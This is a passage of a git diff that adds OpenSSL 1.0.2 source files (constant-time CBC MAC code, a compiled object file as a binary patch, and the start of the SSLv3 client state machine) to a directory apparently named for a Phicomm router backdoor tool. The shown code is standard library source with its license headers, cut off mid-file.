+    /*
+     * For SSLv3, if we're going to have any starting blocks then we need at
+     * least two because the header is larger than a single block.
+     */
+    if (num_blocks > variance_blocks + (is_sslv3 ? 1 : 0)) {
+        num_starting_blocks = num_blocks - variance_blocks;
+        k = md_block_size * num_starting_blocks;
+    }
+
+    bits = 8 * mac_end_offset;
+    if (!is_sslv3) {
+        /*
+         * Compute the initial HMAC block. For SSLv3, the padding and secret
+         * bytes are included in |header| because they take more than a
+         * single block.
+         */
+        bits += 8 * md_block_size;
+        memset(hmac_pad, 0, md_block_size);
+        OPENSSL_assert(mac_secret_length <= sizeof(hmac_pad));
+        memcpy(hmac_pad, mac_secret, mac_secret_length);
+        for (i = 0; i < md_block_size; i++)
+            hmac_pad[i] ^= 0x36;
+
+        md_transform(md_state.c, hmac_pad);
+    }
+
+    if (length_is_big_endian) {
+        memset(length_bytes, 0, md_length_size - 4);
+        length_bytes[md_length_size - 4] = (unsigned char)(bits >> 24);
+        length_bytes[md_length_size - 3] = (unsigned char)(bits >> 16);
+        length_bytes[md_length_size - 2] = (unsigned char)(bits >> 8);
+        length_bytes[md_length_size - 1] = (unsigned char)bits;
+    } else {
+        memset(length_bytes, 0, md_length_size);
+        length_bytes[md_length_size - 5] = (unsigned char)(bits >> 24);
+        length_bytes[md_length_size - 6] = (unsigned char)(bits >> 16);
+        length_bytes[md_length_size - 7] = (unsigned char)(bits >> 8);
+        length_bytes[md_length_size - 8] = (unsigned char)bits;
+    }
+
+    if (k > 0) {
+        if (is_sslv3) {
+            /*
+             * The SSLv3 header is larger than a single block. overhang is
+             * the number of bytes beyond a single block that the header
+             * consumes: either 7 bytes (SHA1) or 11 bytes (MD5).
+             */
+            unsigned overhang = header_length - md_block_size;
+            md_transform(md_state.c, header);
+            memcpy(first_block, header + md_block_size, overhang);
+            memcpy(first_block + overhang, data, md_block_size - overhang);
+            md_transform(md_state.c, first_block);
+            for (i = 1; i < k / md_block_size - 1; i++)
+                md_transform(md_state.c, data + md_block_size * i - overhang);
+        } else {
+            /* k is a multiple of md_block_size. */
+            memcpy(first_block, header, 13);
+            memcpy(first_block + 13, data, md_block_size - 13);
+            md_transform(md_state.c, first_block);
+            for (i = 1; i < k / md_block_size; i++)
+                md_transform(md_state.c, data + md_block_size * i - 13);
+        }
+    }
+
+    memset(mac_out, 0, sizeof(mac_out));
+
+    /*
+     * We now process the final hash blocks. For each block, we construct it
+     * in constant time. If the |i==index_a| then we'll include the 0x80
+     * bytes and zero pad etc. For each block we selectively copy it, in
+     * constant time, to |mac_out|.
+     */
+    for (i = num_starting_blocks; i <= num_starting_blocks + variance_blocks;
+         i++) {
+        unsigned char block[MAX_HASH_BLOCK_SIZE];
+        unsigned char is_block_a = constant_time_eq_8(i, index_a);
+        unsigned char is_block_b = constant_time_eq_8(i, index_b);
+        for (j = 0; j < md_block_size; j++) {
+            unsigned char b = 0, is_past_c, is_past_cp1;
+            if (k < header_length)
+                b = header[k];
+            else if (k < data_plus_mac_plus_padding_size + header_length)
+                b = data[k - header_length];
+            k++;
+
+            is_past_c = is_block_a & constant_time_ge_8(j, c);
+            is_past_cp1 = is_block_a & constant_time_ge_8(j, c + 1);
+            /*
+             * If this is the block containing the end of the application
+             * data, and we are at the offset for the 0x80 value, then
+             * overwrite b with 0x80.
+             */
+            b = constant_time_select_8(is_past_c, 0x80, b);
+            /*
+             * If this the the block containing the end of the application
+             * data and we're past the 0x80 value then just write zero.
+             */
+            b = b & ~is_past_cp1;
+            /*
+             * If this is index_b (the final block), but not index_a (the end
+             * of the data), then the 64-bit length didn't fit into index_a
+             * and we're having to add an extra block of zeros.
+             */
+            b &= ~is_block_b | is_block_a;
+
+            /*
+             * The final bytes of one of the blocks contains the length.
+             */
+            if (j >= md_block_size - md_length_size) {
+                /* If this is index_b, write a length byte. */
+                b = constant_time_select_8(is_block_b,
+                                           length_bytes[j -
+                                                        (md_block_size -
+                                                         md_length_size)], b);
+            }
+            block[j] = b;
+        }
+
+        md_transform(md_state.c, block);
+        md_final_raw(md_state.c, block);
+        /* If this is index_b, copy the hash value to |mac_out|. */
+        for (j = 0; j < md_size; j++)
+            mac_out[j] |= block[j] & is_block_b;
+    }
+
+    EVP_MD_CTX_init(&md_ctx);
+    EVP_DigestInit_ex(&md_ctx, ctx->digest, NULL /* engine */ );
+    if (is_sslv3) {
+        /* We repurpose |hmac_pad| to contain the SSLv3 pad2 block. */
+        memset(hmac_pad, 0x5c, sslv3_pad_length);
+
+        EVP_DigestUpdate(&md_ctx, mac_secret, mac_secret_length);
+        EVP_DigestUpdate(&md_ctx, hmac_pad, sslv3_pad_length);
+        EVP_DigestUpdate(&md_ctx, mac_out, md_size);
+    } else {
+        /* Complete the HMAC in the standard manner. */
+        for (i = 0; i < md_block_size; i++)
+            hmac_pad[i] ^= 0x6a;
+
+        EVP_DigestUpdate(&md_ctx, hmac_pad, md_block_size);
+        EVP_DigestUpdate(&md_ctx, mac_out, md_size);
+    }
+    EVP_DigestFinal(&md_ctx, md_out, &md_out_size_u);
+    if (md_out_size)
+        *md_out_size = md_out_size_u;
+    EVP_MD_CTX_cleanup(&md_ctx);
+}
+
+#ifdef OPENSSL_FIPS
+
+/*
+ * Due to the need to use EVP in FIPS mode we can't reimplement digests but
+ * we can ensure the number of blocks processed is equal for all cases by
+ * digesting additional data.
+ */
+
+void tls_fips_digest_extra(const EVP_CIPHER_CTX *cipher_ctx,
+                           EVP_MD_CTX *mac_ctx, const unsigned char *data,
+                           size_t data_len, size_t orig_len)
+{
+    size_t block_size, digest_pad, blocks_data, blocks_orig;
+    if (EVP_CIPHER_CTX_mode(cipher_ctx) != EVP_CIPH_CBC_MODE)
+        return;
+    block_size = EVP_MD_CTX_block_size(mac_ctx);
+    /*-
+     * We are in FIPS mode if we get this far so we know we have only SHA*
+     * digests and TLS to deal with.
+     * Minimum digest padding length is 17 for SHA384/SHA512 and 9
+     * otherwise.
+     * Additional header is 13 bytes. To get the number of digest blocks
+     * processed round up the amount of data plus padding to the nearest
+     * block length. Block length is 128 for SHA384/SHA512 and 64 otherwise.
+     * So we have:
+     * blocks = (payload_len + digest_pad + 13 + block_size - 1)/block_size
+     * equivalently:
+     * blocks = (payload_len + digest_pad + 12)/block_size + 1
+     * HMAC adds a constant overhead.
+     * We're ultimately only interested in differences so this becomes
+     * blocks = (payload_len + 29)/128
+     * for SHA384/SHA512 and
+     * blocks = (payload_len + 21)/64
+     * otherwise.
+     */
+    digest_pad = block_size == 64 ? 21 : 29;
+    blocks_orig = (orig_len + digest_pad) / block_size;
+    blocks_data = (data_len + digest_pad) / block_size;
+    /*
+     * MAC enough blocks to make up the difference between the original and
+     * actual lengths plus one extra block to ensure this is never a no op.
+     * The "data" pointer should always have enough space to perform this
+     * operation as it is large enough for a maximum length TLS buffer.
+     */
+    EVP_DigestSignUpdate(mac_ctx, data,
+                         (blocks_orig - blocks_data + 1) * block_size);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_cbc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_cbc.o
new file mode 100644
index 0000000000000000000000000000000000000000..40a7eccc8b272c392ca8b1c11cf440d6839e7362
GIT binary patch
literal 7968
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_clnt.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_clnt.c
new file mode 100644
index 0000000..f186c3c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_clnt.c
@@ -0,0 +1,3499 @@
+/* ssl/s3_clnt.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ *
+ * Portions of the attached software ("Contribution") are developed by
+ * SUN MICROSYSTEMS, INC., and are contributed to the OpenSSL project.
+ *
+ * The Contribution is licensed pursuant to the OpenSSL open source
+ * license provided above.
+ *
+ * ECC cipher suite support in OpenSSL originally written by
+ * Vipul Gupta and Sumit Gupta of Sun Microsystems Laboratories.
+ *
+ */
+/* ====================================================================
+ * Copyright 2005 Nokia. All rights reserved.
+ *
+ * The portions of the attached software ("Contribution") is developed by
+ * Nokia Corporation and is licensed pursuant to the OpenSSL open source
+ * license.
+ *
+ * The Contribution, originally written by Mika Kousa and Pasi Eronen of
+ * Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
+ * support (see RFC 4279) to OpenSSL.
+ *
+ * No patent licenses or other rights except those expressly stated in
+ * the OpenSSL open source license shall be deemed granted or received
+ * expressly, by implication, estoppel, or otherwise.
+ *
+ * No assurances are provided by Nokia that the Contribution does not
+ * infringe the patent or other intellectual property rights of any third
+ * party or that the license provides you with all the necessary rights
+ * to make use of the Contribution.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
+ * ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
+ * SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
+ * OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
+ * OTHERWISE.
+ */
+
+#include <stdio.h>
+#include "ssl_locl.h"
+#include "kssl_lcl.h"
+#include <openssl/buffer.h>
+#include <openssl/rand.h>
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#include <openssl/md5.h>
+#ifdef OPENSSL_FIPS
+# include <openssl/fips.h>
+#endif
+#ifndef OPENSSL_NO_DH
+# include <openssl/dh.h>
+#endif
+#include <openssl/bn.h>
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+
+static int ca_dn_cmp(const X509_NAME *const *a, const X509_NAME *const *b);
+
+#ifndef OPENSSL_NO_SSL3_METHOD
+static const SSL_METHOD *ssl3_get_client_method(int ver)
+{
+    if (ver == SSL3_VERSION)
+        return (SSLv3_client_method());
+    else
+        return (NULL);
+}
+
+IMPLEMENT_ssl3_meth_func(SSLv3_client_method,
+                         ssl_undefined_function,
+                         ssl3_connect, ssl3_get_client_method)
+#endif
+int ssl3_connect(SSL *s)
+{
+    BUF_MEM *buf = NULL;
+    unsigned long Time = (unsigned long)time(NULL);
+    void (*cb) (const SSL *ssl, int type, int val) = NULL;
+    int ret = -1;
+    int new_state, state, skip = 0;
+
+    RAND_add(&Time, sizeof(Time), 0);
+    ERR_clear_error();
+    clear_sys_error();
+
+    if (s->info_callback != NULL)
+        cb = s->info_callback;
+    else if (s->ctx->info_callback != NULL)
+        cb = s->ctx->info_callback;
+
+    s->in_handshake++;
+    if (!SSL_in_init(s) || SSL_in_before(s))
+        SSL_clear(s);
+
+#ifndef OPENSSL_NO_HEARTBEATS
+    /*
+     * If we're awaiting a HeartbeatResponse, pretend we already got and
+     * don't await it anymore, because Heartbeats don't make sense during
+     * handshakes anyway.
+     */
+    if (s->tlsext_hb_pending) {
+        s->tlsext_hb_pending = 0;
+        s->tlsext_hb_seq++;
+    }
+#endif
+
+    for (;;) {
+        state = s->state;
+
+        switch (s->state) {
+        case SSL_ST_RENEGOTIATE:
+            s->renegotiate = 1;
+            s->state = SSL_ST_CONNECT;
+            s->ctx->stats.sess_connect_renegotiate++;
+            /* break */
+        case SSL_ST_BEFORE:
+        case SSL_ST_CONNECT:
+        case SSL_ST_BEFORE | SSL_ST_CONNECT:
+        case SSL_ST_OK | SSL_ST_CONNECT:
+
+            s->server = 0;
+            if (cb != NULL)
+                cb(s, SSL_CB_HANDSHAKE_START, 1);
+
+            if ((s->version & 0xff00) != 0x0300) {
+                SSLerr(SSL_F_SSL3_CONNECT, ERR_R_INTERNAL_ERROR);
+                ret = -1;
+                goto end;
+            }
+
+            /* s->version=SSL3_VERSION; */
+            s->type = SSL_ST_CONNECT;
+
+            if (s->init_buf == NULL) {
+                if ((buf = BUF_MEM_new()) == NULL) {
+                    ret = -1;
+                    goto end;
+                }
+                if (!BUF_MEM_grow(buf, SSL3_RT_MAX_PLAIN_LENGTH)) {
+                    ret = -1;
+                    goto end;
+                }
+                s->init_buf = buf;
+                buf = NULL;
+            }
+
+            if (!ssl3_setup_buffers(s)) {
+                ret = -1;
+                goto end;
+            }
+
+            /* setup buffing BIO */
+            if (!ssl_init_wbio_buffer(s, 0)) {
+                ret = -1;
+                goto end;
+            }
+
+            /* don't push the buffering BIO quite yet */
+
+            ssl3_init_finished_mac(s);
+
+            s->state = SSL3_ST_CW_CLNT_HELLO_A;
+            s->ctx->stats.sess_connect++;
+            s->init_num = 0;
+            s->s3->flags &= ~SSL3_FLAGS_CCS_OK;
+            /*
+             * Should have been reset by ssl3_get_finished, too.
+             */
+            s->s3->change_cipher_spec = 0;
+            break;
+
+        case SSL3_ST_CW_CLNT_HELLO_A:
+        case SSL3_ST_CW_CLNT_HELLO_B:
+
+            s->shutdown = 0;
+            ret = ssl3_client_hello(s);
+            if (ret <= 0)
+                goto end;
+            s->state = SSL3_ST_CR_SRVR_HELLO_A;
+            s->init_num = 0;
+
+            /* turn on buffering for the next lot of output */
+            if (s->bbio != s->wbio)
+                s->wbio = BIO_push(s->bbio, s->wbio);
+
+            break;
+
+        case SSL3_ST_CR_SRVR_HELLO_A:
+        case SSL3_ST_CR_SRVR_HELLO_B:
+            ret = ssl3_get_server_hello(s);
+            if (ret <= 0)
+                goto end;
+
+            if (s->hit) {
+                s->state = SSL3_ST_CR_FINISHED_A;
+#ifndef OPENSSL_NO_TLSEXT
+                if (s->tlsext_ticket_expected) {
+                    /* receive renewed session ticket */
+                    s->state = SSL3_ST_CR_SESSION_TICKET_A;
+                }
+#endif
+            } else {
+                s->state = SSL3_ST_CR_CERT_A;
+            }
+            s->init_num = 0;
+            break;
+        case SSL3_ST_CR_CERT_A:
+        case SSL3_ST_CR_CERT_B:
+            /* Check if it is anon DH/ECDH, SRP auth */
+            /* or PSK */
+            if (!
+                (s->s3->tmp.
+                 new_cipher->algorithm_auth & (SSL_aNULL | SSL_aSRP))
+&& !(s->s3->tmp.new_cipher->algorithm_mkey & SSL_kPSK)) {
+                ret = ssl3_get_server_certificate(s);
+                if (ret <= 0)
+                    goto end;
+#ifndef OPENSSL_NO_TLSEXT
+                if (s->tlsext_status_expected)
+                    s->state = SSL3_ST_CR_CERT_STATUS_A;
+                else
+                    s->state = SSL3_ST_CR_KEY_EXCH_A;
+            } else {
+                skip = 1;
+                s->state = SSL3_ST_CR_KEY_EXCH_A;
+            }
+#else
+            } else
+                skip = 1;
+
+            s->state = SSL3_ST_CR_KEY_EXCH_A;
+#endif
+            s->init_num = 0;
+            break;
+
+        case SSL3_ST_CR_KEY_EXCH_A:
+        case SSL3_ST_CR_KEY_EXCH_B:
